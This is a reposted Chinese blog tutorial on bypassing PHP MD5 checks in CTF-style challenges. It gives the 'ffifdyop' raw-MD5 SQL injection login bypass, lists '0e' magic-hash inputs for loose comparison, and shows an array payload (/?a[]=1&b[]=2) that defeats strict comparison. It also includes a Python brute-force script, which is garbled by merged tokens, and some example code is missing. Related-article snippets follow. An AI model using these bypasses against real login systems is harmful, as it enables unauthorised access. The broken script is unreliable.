php mysql 绕过_PHP中md5绕过

最新推荐文章于 2023-07-29 20:30:52 发布
最新推荐文章于 2023-07-29 20:30:52 发布
阅读量267 收藏
点赞数
文章标签: php mysql 绕过
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_31221157/article/details/114907579
版权

一、md5($password,true)的SQL注入问题

这里要提到一下MySQL中的数值比较问题。

1、当数字和字符串比较时,若字符串的数字部分(需要从头开始)和数字是相同的,那么则返回的是true。

select if(1="1abcd","等于","不等于") as test;

20201014141938298265.png

if(exp1,stat1,stat2)类似于高级语言中三元运算符。当exp1为true的是否返回stat1,为false返回stat2。

2、以数字开头的字符串,若开头的字符不是0,那么在做逻辑运算的时候返回的是1,也就是true。

select * from user where password =‘‘or‘1234a‘;

看一下这个php md5($pass,true) 的漏洞:

select * from user where password = md5($pass,true);

20201014141938351973.png

可以看到这里的raw参数是True,为返回原始16字符二进制格式。

也就是说当md5函数的第二个参数为true时,该函数的输出是原始二进制格式,会被作为字符串处理。

如果构造一个‘or‘xxx‘的密码,只要后面的字符串为真即可。那么可以根据32位16进制的字符串来查找,‘or‘对应的16进制是276f7227,所以我们的目标就是要找一个字符串,取32位16进制的md5值里带有276f7227这个字段的,在276f7227这个字段后面紧跟一个数字(除了0)1-9,对应的asc码值是49-57,转化为16进制就是31-39,也就是含有276f7227+(31-39)这个字段,就可以满足要求。

则拼接后构成的SQL语句为:

select * from user where password=‘‘or‘1asodijfoi‘;

select * from user where password=‘‘or‘1abcdefg‘ ---> True

select * from user where password=‘‘or‘0abcdefg‘ ---> False

select * from user where password=‘‘or‘1‘ ---> True

select * from user where password=‘‘or‘2‘ ---> True

select * from user where password=‘‘or‘0‘ ---> False

只要‘or‘后面的字符串为一个非零的数字开头都会返回True,这就是我们的突破点。

目前只知道用这个字符串 ffifdyop具体怎么来的,目前脚本还在研究中。

二、两变量值不相等,md5计算散列值后相等的绕过

==的绕过

PHP中==是判断值是否相等,若两个变量的类型不相等,则会转化为相同类型后再进行比较。

PHP在处理哈希字符串的时候,它把每一个以0e开头的哈希值都解析为0。

注意:==号相等必须满足0e后面全是数字,若存在字母则不行。

}

}?>

常见的如下:

在md5加密后以0E开头

QNKCDZO

240610708

s878926199a

s155964671a

===的绕过

===会比较类型,这个时候可以用到PHP中md5()函数无法处理数组(会返回NULL)来实现绕过。

}

}?>

payload: /?a[]=1&b[]=2 (上面==的例子也可以用数组绕过)

三、MD5碰撞

脚本:

#-*- coding: utf-8 -*-

import multiprocessing

import hashlib

import random

importstringimport sys

CHARS= string.letters + string.digits

def cmp_md5(substr, stop_event, str_len,. start=0, size=20):

globalCHARSwhile not stop_event.is_set():rnds= ‘‘.join(random.choice(CHARS) for _ in range(size))md5 = hashlib.md5(rnds)

value= md5.hexdigest()if value[start: start+str_len] == substr:

printrnds

stop_event.set()‘‘‘#碰撞双md5

md5 = hashlib.md5(value)

if md5.hexdigest()[start: start+str_len] == substr:

print rnds+ "=>" + value+"=>"+ md5.hexdigest() + "\n"

stop_event.set()‘‘‘

if __name__ == ‘__main__‘:

substr = sys.argv[1].strip()

start_pos= int(sys.argv[2]) if len(sys.argv) > 1 else 0str_len= len(substr)

cpus= multiprocessing.cpu_count()

stop_event= multiprocessing.Event()

processes= [multiprocessing.Process(target=cmp_md5, args=(substr,stop_event, str_len,start_pos))for i in range(cpus)]for p in processes:p.start()for p in processes:p.join()

还有MD5和双MD5以后的值都是0e开头的

CbDLytmyGm2xQyaLNhWn

770hQgrBOjrcqftrlaZk

7r4lGXCH2Ksu2JNT3BYM

正常0e开头:

QNKCDZO

0e830400451993494058024219903391

240610708

0e462097431906509019562988736854

s878926199a

0e545993274517709034328855841020

s155964671a

0e342768416822451524974117254469

s214587387a

0e848240448830537924465865611904

s214587387a

0e848240448830537924465865611904

s878926199a

0e545993274517709034328855841020

s1091221200a

0e940624217856561557816327384675

s1885207154a

0e509367213418206700842008763514

s1502113478a

0e861580163291561247404381396064

s1885207154a

0e509367213418206700842008763514

s1836677006a

0e481036490867661113260034900752

s155964671a

0e342768416822451524974117254469

s1184209335a

0e072485820392773389523109082030

s1665632922a

0e731198061491163073197128363787

s1502113478a

0e861580163291561247404381396064

s1836677006a

0e481036490867661113260034900752

s1091221200a

0e940624217856561557816327384675

s155964671a

0e342768416822451524974117254469

s1502113478a

0e861580163291561247404381396064

s155964671a

0e342768416822451524974117254469

s1665632922a

0e731198061491163073197128363787

s155964671a

0e342768416822451524974117254469

s1091221200a

0e940624217856561557816327384675

s1836677006a

0e481036490867661113260034900752

s1885207154a

0e509367213418206700842008763514

s532378020a

0e220463095855511507588041205815

s878926199a

0e545993274517709034328855841020

s1091221200a

0e940624217856561557816327384675

s214587387a

0e848240448830537924465865611904

s1502113478a

0e861580163291561247404381396064

s1091221200a

0e940624217856561557816327384675

s1665632922a

0e731198061491163073197128363787

s1885207154a

0e509367213418206700842008763514

s1836677006a

0e481036490867661113260034900752

s1665632922a

0e731198061491163073197128363787

s878926199a

0e545993274517709034328855841020

原文:https://www.cnblogs.com/du1ge/p/13812118.html

吻死破孩
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[BJDCTF2020]Easy MD5( .md5( $password, true)绕过)
xlcvv的博客
04-08 704
随便提交都无果,bp抓包: 当password=md5($pass,true)为真时,就能够select *了,而md5
php md5弱比较绕过
qq_53086690的博客
06-16 409
md5($password,true)绕过 可以进行输入ffifdyop进行绕过 ffifdyop进行md5然后再转16进制就会变成’or 6xxxx就会变成永真式。 phpmd5进行==比较可以进行绕过 # ==绕过 1.可以进行数组绕过例如 md5($a) == md5($b) # a[]=1&b[]=2 2.可以进行科学计数法进行绕过 # ===绕过 1.只能是数组绕过 ...
SQL注入-md5加密参数漏洞(CTF例题)
bin789456的博客
08-29 1503
漏洞成因 phpmd5函数有一个可选参数,如果开发者写查询数据库函数时使用了这个参数,或者在数据存储时是md5后的字符串形式存储,都有可能产生这个漏洞。 利用方法 md5看似是非常强加密措施,但是一旦没有返回我们常见的16进制数,返回了二进制原始输出格式,在浏览器编码的作用下就会编码成为奇怪的字符串(对于二进制一般都会编码)。 我们使用md5碰撞,一旦在这些奇怪的字符串碰撞出了可以进行SQL注入的特殊字符串,那么就可以越过登录了。 下面是参考资料的英文原版: The trick: Raw MD5 h
PHPMD5常见绕过
iczfy585的博客
05-12 9751
PHPmd5的绕过md5($password,true)的SQL注入问题两变量值不相等,md5计算散列值后相等的绕过MD5碰撞 函数: md5($string,bool): 得到一个字符串散列值。 其第二个参数默认为false,表示该函数返回值是32个字符的十六进制数。 若指定为true,则表示函数返回的是16字节的二进制格式(这样通过浏览器解析会出现乱码)。 md5($password,true)的SQL注入问题 这里需要注意一下MYSQL的一些数值比较的特征。 1.当数字和字符串比较时,若字符
password=md5($pass,true)绕过、弱类型、MD5强碰撞
sGanYu
09-27 3804
在输入框查询任何内容都返回为空,尝试sql注入无果,用bp抓包 select * from 'admin' where password=md5($pass,true) 确实执行了我们的查询,但是在通过where时,条件不匹配,导致报错 需要password=md5($pass,true)条件为真时,才会执行select * form admin md5()函数会将我们输入的值,加密,然后转换成16字符的二进制格式,由于ffifdyop被md5加密后的276f722736c95d...
buuctf 刷题2(md5(true)参数漏洞&php字符串解析特性&php&dirsearch&php反序列化)
weixin_63231007的博客
05-02 2144
[BJDCTF2020]Easy MD5 1 burp抓包,发现传入的参数的语句为: Hint: select * from 'admin' where password=md5($pass,true) md5函数介绍为: md5( string , raw ) string : 规定需要计算的字符串 raw : 规定十六进制或二进制输出格式。 true:16字符二进制格式 false(默认): 32字符十六进制数 md5 true参数漏洞有 ff...
sql注入:md5($password,true)
热门推荐
March97的博客
07-27 1万+
       前几天做了一道CTF的题目,是在”实验吧“的一道简单的web题目,当然这道题目很多人都解出来了,因为它的.php文件名就是答案。        他的网页链接里面的php文件名就是’ffifdyop.php‘。          上面的’ffifdyop‘就是我们要输入的密码。哦,忘了介绍,这道题目只需要表单提交密码。       当然如果直接输入ffifdyop,提交后就能出...
PHPMD5加密的简单绕过及基于MD5加密的SQL注入
Landasika的博客
12-10 5220
部分内容参考于: sql注入:md5($password,true)_March97的博客-CSDN博客_md5($pass,true) 目录 一、简介 二、基于PHP漏洞的绕过 1、MD5弱比较“==”绕过 2、MD5强比较“===”绕过 三、有关SQL注入的MD5绕过 1、起因 2、注入原理 一、简介 md5() 函数计算字符串的 MD5 散列。 MD5 报文摘要算法将任意长度的信息作为输入值,并将其换算成一个 128 位长度的"指纹信息"或"报文摘要"值来..
[BJDCTF2020]Easy MD5(超级详细)
weixin_73560599的博客
07-29 2023
这题涉及的知识点挺多的,包括md5($pass,true)的注入,php的弱类型比较以及强类型比较 尤其是MD5的注入 非常有意思涉及的内容挺多,开阔视野以及知识
MD5绕过
m0_64236521的博客
02-03 713
md5绕过
php_mysql.rar_php_mysql
09-20
是初学者学习和掌握php_mysql基本知识的理想的演示结合实践的教程
PHP函数addslashes和mysql_real_escape_string的区别
10-26
主要介绍了PHP函数addslashes和mysql_real_escape_string的区别,以及一个SQL注入漏洞介绍,需要的朋友可以参考下
MYSQL_application_in_PHP5.rar_MYSQL_in_php5
09-24
MYSQLPHP5的应用MYSQL application in PHP5
mysql.rar_MYSQL_php mysql_php扩展
09-23
这是使用PHPmysql扩展库完成对mysql操作的案例。
php mysql实现mysql_select_db选择数据库
10-20
PHP,与MySQL服务器建立连接后,需要确定所要连接的数据库,此时我们可以使用mysql_select_db函数,该函数用于选择需要操作的数据库,需要的朋友可以参考下
本地php怎么越过账号密码,PHPmd5绕过
weixin_28792813的博客
03-11 329
一、md5($password,true)的SQL注入问题这里要提到一下MySQL的数值比较问题。1、当数字和字符串比较时,若字符串的数字部分(需要从头开始)和数字是相同的,那么则返回的是true。select if(1="1abcd","等于","不等于") as test;if(exp1,stat1,stat2)类似于高级语言三元运算符。当exp1为true的是否返回stat1,为fals...
关于MD5函数的绕过
since_2020的博客
08-09 1007
MD5 一、md5($password,true)导致的注入 某次刷题遇到返回包有这个 HTTP/1.1 200 OK Server: openresty Date: Mon, 09 Aug 2021 10:08:23 GMT Content-Type: text/html; charset=UTF-8 Connection: close Hint: select * from 'admin' where password=md5($pass,true) X-Powered-By: PHP/7.3.13
CTF常见MD5
m0_52149675的博客
05-17 855
[BJDCTF2020]Easy MD5
PHP的sql注入(密码是md5加密的)
少年,不酷不帅
06-21 2613
2018年6月20日记录: 在实验吧做了一道关于后台登陆的题目,之前自己对php注入方面认识的不是很好,所以一直对注入这方面谈虎色变,今天做了一下,其实自己好好分析整个过程,发现并不是特别难的,难得只是不敢动手去做: 我看到这个问题的时候一看网址: http://ctf5.shiyanbar.com/web/houtai/ffifdyop.php ```没有文件包含的意思...
php.ini pdo_mysql.default_socket
最新发布
09-14
这种情况下,PHP通过TCP/IP连接MySQL数据库,在连接字符串指定MySQL服务器的IP地址和端口号。 如果想要使用Unix套接字文件进行连接,可以通过修改php.ini文件pdo_mysql.default_socket的值来实现。例如,可以将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值